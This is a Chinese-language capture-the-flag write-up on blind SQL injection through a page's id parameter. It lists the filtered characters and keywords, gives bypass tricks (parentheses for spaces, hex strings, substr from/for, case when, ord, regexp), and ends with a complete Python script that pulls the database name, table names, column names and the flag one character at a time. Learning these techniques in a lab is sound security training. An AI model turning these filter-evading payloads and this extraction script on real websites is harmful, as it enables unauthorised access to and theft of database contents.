第一眼这个题目,跟前几天做过的很像
点一个文章发现地址栏上有个id参数,应该是注入了
令id=1'返回enheng?发现'被过滤了,fuzz测试过滤了空格、'、"、=、like、ascii、union、order by、|、sleep、 。
常用的盲注payload为payload=1^if(ascii(substr('flag',1,1))=104,1,0)
过滤了空格可以用括号代替;
过滤了单引号可以用16进制代替;
过滤了逗号,对于substr可以用 substr(database() from 1 for 1 )代替substr(database(),1,1),if中有逗号可以用case when代替if;
过滤了 ascii可以用ord代替;
过滤了等号和like可以用regexp代替。
这样上面的常规语句就可以转化为 id=1^case(ord(substr(database()from(1)for(1))))when(102)then(2)else(3)end
盲注脚本(来自羽师傅):
import requests url="http://733ff90c-f8ab-4a3b-af6e-3ebb2f4a7b12.chall.ctf.show/index.php?id=1^" flag="" for i in range(1,50): print("i="+str(i)) for j in range(38,126): #u="case(ord(substr(database()from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #库名 web1 #u="case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #表名 flag、page、user #u="case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #列名 FLAG_COLUMN、flag u="case(ord(substr((select(group_concat(flag))from(flag))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #flag字段 u=url+u r=requests.get(u) t=r.text if("I asked nothing" in t): flag+=chr(j) print(flag) break
